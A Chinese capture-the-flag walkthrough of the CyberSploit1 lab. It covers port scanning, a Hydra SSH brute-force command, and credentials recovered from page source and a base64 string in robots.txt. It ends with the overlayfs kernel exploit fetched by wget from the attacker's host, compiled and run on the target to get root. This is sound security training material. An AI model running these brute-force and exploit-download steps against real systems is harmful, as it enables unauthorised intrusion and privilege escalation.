• 靶场通关记录


    目录

    一、信息收集-端口扫描

         目标开放端口收集

    目标端口对应服务探测

    信息收集-端口测试

    二、 22-SSH弱口令爆破(挂着干别的)

    80-HTTP端口的信息收集

    三、信息收集-目录访问

    漏洞利用-getwebshell


    总结


    getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录

    提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权

    准备工作


    • 启动VPN
      获取攻击机IP > 192.168.45.220

    • 启动靶机
      获取目标机器IP > 192.168.176.92

      信息收集-端口扫描


         目标开放端口收集

    • Nmap开放端口扫描2次
      1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]
      2. └─# ┌──(root㉿Kali)-[/home/bachang/Blogger]
      3. └─# sudo nmap --min-rate 10000 -p- 192.168.176.92
      4. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST
      5. Nmap scan report for 192.168.176.92
      6. Host is up (0.30s latency).
      7. Not shown: 65533 closed tcp ports (reset)
      8. PORT STATE SERVICE
      9. 22/tcp open ssh
      10. 80/tcp open http
      11. Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

    通过两次收集到的端口:→22,80

    目标端口对应服务探测

    1. # tcp探测

    2. sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92

    信息收集-端口测试

    两个端口的话,通常突破口在80端口

    22-SSH端口的信息收集

    22-SSH端口版本信息与MSF利用(待定)

    通过Nmap探测获得SSH的版本信息,可以尝试利用

    1. # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10

    2. msfconsole

    3. # 搜索对应脚本

    4. msf6 > searchsploit OpenSSH 5.9p1

    貌似存在用户枚举,等没思路的时候可以来试试

    22-SSH手动登录尝试(失败)

    尝试root账户的密码爆破

    1. ssh root@192.168.176.92 -p 22

    2. # 密码尝试

    3. password > root

     22-SSH弱口令爆破(挂着干别的)

    尝试root账户的密码爆破,利用工具hydra,线程-t为6

    1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22

    80-HTTP端口的信息收集

    访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始

    信息收集-源码查看
    1. # 包括文章中是否写明一些敏感信息

    2. curl http://192.168.176.92:80

    收集到一个用户名信息 itsskv

    信息收集-目录扫描
    信息收集-目录扫描初步
    1. dirsearch -u http://192.168.176.92:80 -x 302,403

    因为扫出了目录,深层次的扫描待选

    1. 信息收集-目录扫描(后缀)

    2. 信息收集-目录扫描(深度/大字典)

    3. 信息收集-目录扫描(深度/大字典后缀)

    信息收集-目录访问

    /robots.txt端点访问
    存在一串代码,推测是加密,带等号尝试用bashe64解密

    1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

    base64解密

    利用kali解密得到了内容,确认是base64加密

    1. ┌──(root㉿Kali)-[/home/bachang/Blogger]

    2. └─# echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

    3. " | base64 -d

    4. cybersploit{youtube.com/c/cybersploit}

    另外两个端点没东西

    漏洞利用-getwebshell

    信息泄露getwebshell

    已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit}
    头脑风暴一下,密码会不会和cybersploit{youtube.com/c/cybersploit}有关
    之前hyrda可以爆破说明22端口是允许账号密码登录的

    22-SSH账号密码登录(成功)

    获取账号密码之后利用SSH进行登录

    1. ssh itsskv@192.168.176.92 -p22

    2. password > cybersploit (失败)

    3. password > cybersploit{youtube.com/c/cybersploit}(成功)

    密码真长,我真的会谢

    内网遨游-getshell


    FLAG1获取

    1. # 有2个,理论上排除掉第一个,找home下

    2. itsskv@cybersploit-CTF:~$ find / -name local.txt 2>/dev/null

    3. /usr/share/checkbox/jobs/local.txt

    4. /home/itsskv/local.txt

    5. itsskv@cybersploit-CTF:~$ cat /home/itsskv/local.txt

    6. *********************

    信息收集-内网基础信息收集

    在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

    检测操作系统的发行版本
    1. # 确定发行版本 较老

    2. itsskv@cybersploit-CTF:~$ lsb_release -a

    3. No LSB modules are available.

    4. Distributor ID: Ubuntu

    5. Description: Ubuntu 12.04.5 LTS

    6. Release: 12.04

    7. Codename: precise

    查看内核版本信息
    1. # 确定内核版本

    2. itsskv@cybersploit-CTF:~$ uname -a

    3. Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

    确认home目录下用户
    1. itsskv@cybersploit-CTF:~$ ls -al /home

    2. total 16

    3. # 有两个用户

    4. drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit

    5. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv

    确认home目录下是否有隐藏文件
    1. # 例如.ssh找密码 ./*_history找历史记录等

    2. itsskv@cybersploit-CTF:~$ ls -al /home/itsskv

    3. # 查看了一下没啥

    4. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 .

    5. drwxr-xr-x 4 root root 4096 Jun 25 2020 ..

    6. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history

    7. -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout

    8. -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc

    9. drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache

    10. drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config

    权限提升

    Linux提权-内核overlayfs提权尝试

    因为发行版本较老,若存在以下情况进行overlayfsLinux Kernel Version提权

    系统版本
    Linux Kernel Version大于3.13.0小于3.19
    UbuntuLinux 15.04
    UbuntuLinux 14.10
    UbuntuLinux 14.10
    UbuntuLinux 12.04
    漏洞利用-内核overlayfs提权
    1. msfconsole

    2. msf > searchsploit overlayfs

    结合 3.13.0-32的版本信息选择2与3

    1. # 如果想查看msf对应的内容

    2. cat /usr/share/exploitdb/exploits/linux/local/37292.c

    将文件保存在当前目录下,方便开启http服务

    1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

    2. └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c

    3. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

    4. └─# ls

    5. hydra.restore shell.c

    攻击机开启服务

    1.sudo python3 -m http.server 80

    目标机器

    1. # 首先到具有权限的目录下 如/tmp

    2. itsskv@cybersploit-CTF:~$ cd /tmp

    3. # 下载

    4. itsskv@cybersploit-CTF:/tmp$ wget http://192.168.45.220/shell.c

    1. # 给权限

    2. itsskv@cybersploit-CTF:/tmp$ chmod +x shell.c

    3. # 如果是c的需要进行编译

    4. itsskv@cybersploit-CTF:/tmp$ gcc shell.c -o shell.c

    5. # 运行

    6. itsskv@cybersploit-CTF:/tmp$ ./shell.c

    7. spawning threads

    8. mount #1

    9. mount #2

    10. child threads done

    11. /etc/ld.so.preload created

    12. creating shared library

    13. # whoami

    14. root

    提权成功

    FLAG2获取

    1. # cat /root/proof.txt

    2. *********************

    完结撒花~~~

    原文地址: https://bbs.zkaq.cn/t/30873.html

     还没看够?可以关注一下呦~

     渗透工具

    技术文档、书籍

     

    面试题

    帮助你在面试中脱颖而出

    视频

    基础到进阶

    环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

     

  • 相关阅读:
    [word] Word如何删除所有的空行? #职场发展#学习方法
    本地环境下启动openFaas创建的Java的云函数
    docker运行中的容器新增映射端口
    数据结构之单链表
    《工程伦理与学术道德》第二章习题
    tokenizers Tokenizer 类
    HackTheBox-Starting Point--Tier 1---Sequel
    基于Springboot外卖系统12:删除菜品套餐类别+修改套餐类别信息
    模拟卷Leetcode【普通】081. 搜索旋转排序数组 II
    TypeScript16:抽象类
  • 原文地址:https://blog.csdn.net/zkaqlaoniao/article/details/133695612